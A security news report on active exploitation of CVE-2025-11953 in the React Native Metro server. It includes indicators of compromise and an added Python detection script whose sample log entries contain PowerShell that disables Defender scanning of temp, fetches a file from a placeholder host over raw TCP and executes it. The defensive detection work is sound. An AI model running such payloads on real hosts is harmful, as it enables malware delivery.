Threat actors have been observed exploiting a serious security vulnerability in the popular "@react-native-community/cli" npm package that affects the Metro Development Server. According to cybersecurity firm VulnCheck, exploitation of CVE-2025-11953, also known as Metro4Shell, was first noticed on December 21, 2025.

The vulnerability, which has a CVSS score of 9.8, enables remote unauthenticated attackers to run arbitrary operating system commands on the underlying host. JFrog first disclosed details of the flaw in November 2025. Although more than a month has passed since the initial in-the-wild exploitation, the "activity has yet to see broad public acknowledgment," VulnCheck added.

In the attack against VulnCheck's honeypot network, the threat actors used the vulnerability to deliver a Base64-encoded PowerShell script that, once decoded, performs a number of tasks, including adding Microsoft Defender Antivirus exclusions for the temporary folder ("C:\Users\\AppData\Local\Temp") and the current working directory. The script also opens a raw TCP connection to an attacker-controlled host and port ("8.218.43[.]248:60124"), sends a request to retrieve data, writes the response to a file in the temporary directory, and runs it.
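As an added illustration, not code from the article or from VulnCheck, the following Python detection logic runs over constructed PowerShell script-block log entries (the kind a SIEM collects from event 4104) and flags the behaviours described above: Defender exclusions on the temp folder or current directory, a raw TCP client, and a file written to temp and then executed. It also decodes a `-EncodedCommand` argument before matching, since the delivered script was Base64-encoded. The IP address, port, file name and log text are constructed placeholders; only the behaviour pattern comes from the article.

```python
import base64
import re

# Detection patterns for the behaviours the article attributes to the payload:
# Defender exclusions on temp / current directory, a raw TCP client used to
# fetch data, and a file written to temp and then executed.
RULES = {
    "defender_exclusion_temp_or_cwd": re.compile(
        r"Add-MpPreference\s+-ExclusionPath\s+[^;\n]*?"
        r"(\$env:TEMP|AppData\\Local\\Temp|Get-Location|\$PWD)",
        re.IGNORECASE,
    ),
    "raw_tcp_client": re.compile(r"System\.Net\.Sockets\.TcpClient", re.IGNORECASE),
    "write_to_temp": re.compile(
        r"(WriteAllBytes|Set-Content|Out-File)[^;\n]*(\$env:TEMP|AppData\\Local\\Temp)",
        re.IGNORECASE,
    ),
    "execute_from_temp": re.compile(
        r"(Start-Process|Invoke-Item|Invoke-Expression|&)\s+[\"']?"
        r"(\$env:TEMP|[^\"'\s]*AppData\\Local\\Temp)",
        re.IGNORECASE,
    ),
}

# PowerShell's -EncodedCommand (and its -enc/-ec/-e short forms) carries
# base64 of UTF-16LE text; a detection must decode it before matching.
ENCODED_ARG = re.compile(
    r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def decode_encoded_command(text):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_ARG.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def match_rules(text):
    """Return the sorted names of all RULES that fire on a script block or its decoded form."""
    candidates = [text]
    decoded = decode_encoded_command(text)
    if decoded:
        candidates.append(decoded)
    return sorted(
        name for name, pattern in RULES.items()
        if any(pattern.search(c) for c in candidates)
    )


def classify(events):
    """Evaluate (event_id, script_text) entries from one host.

    Returns (per_event_hits, verdict). The verdict is 'staged_payload_chain'
    when an exclusion, a raw network fetch and execution from temp all appear,
    which is the combination the article describes for this payload.
    """
    per_event = []
    all_hits = set()
    for event_id, text in events:
        hits = match_rules(text)
        per_event.append((event_id, hits))
        all_hits.update(hits)
    chain = {"defender_exclusion_temp_or_cwd", "raw_tcp_client", "execute_from_temp"}
    if chain <= all_hits:
        verdict = "staged_payload_chain"
    elif all_hits:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return per_event, verdict


def _encode_command(ps):
    # Build a -EncodedCommand value the way PowerShell expects it (UTF-16LE, base64).
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample log entries (placeholder IP/port/file name, not from the article).
SAMPLE_EVENTS = [
    (4104, "powershell.exe -nop -w hidden -EncodedCommand "
           + _encode_command("Add-MpPreference -ExclusionPath $env:TEMP; "
                             "Add-MpPreference -ExclusionPath (Get-Location).Path")),
    (4104, "$c = New-Object System.Net.Sockets.TcpClient('192.0.2.10', 60124); "
           "$s = $c.GetStream(); $b = New-Object byte[] 1048576; $n = $s.Read($b, 0, $b.Length); "
           "[IO.File]::WriteAllBytes(\"$env:TEMP\\stage.exe\", $b[0..($n-1)]); "
           "Start-Process \"$env:TEMP\\stage.exe\""),
    (4104, "Get-ChildItem C:\\projects -Recurse | Measure-Object"),
]

# Constructed benign activity: an exclusion on an application directory, not temp.
BENIGN_EVENTS = [
    (4104, "Add-MpPreference -ExclusionPath 'C:\\Program Files\\LegitApp'"),
    (4104, "Get-Process | Sort-Object CPU -Descending | Select-Object -First 5"),
]

if __name__ == "__main__":
    for label, events in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        hits, verdict = classify(events)
        print(label, verdict, hits)
```

The chain verdict is deliberately stricter than any single rule: an exclusion on a product directory or a lone TcpClient call is common in legitimate administration, whereas the three behaviours together on one host within one session are what made the honeypot activity stand out.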

The downloaded binary is written in Rust and includes anti-analysis checks to hinder static inspection.

The following IP addresses have been identified as the source of the attacks: 5.109.182[.]231, 223.6.249[.]141, and 134.209.69[.]155. VulnCheck described the activity as neither exploratory nor experimental. The delivered payloads, according to the company, were "consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing." CVE-2025-11953 is not noteworthy simply because it exists. It is noteworthy because it reinforces a pattern that defenders keep relearning: regardless of intent, development infrastructure becomes production infrastructure as soon as it is reachable.